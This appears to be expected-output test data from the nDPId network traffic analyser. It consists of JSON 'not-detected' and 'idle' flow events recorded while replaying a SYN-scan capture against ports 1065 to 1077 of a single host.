-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 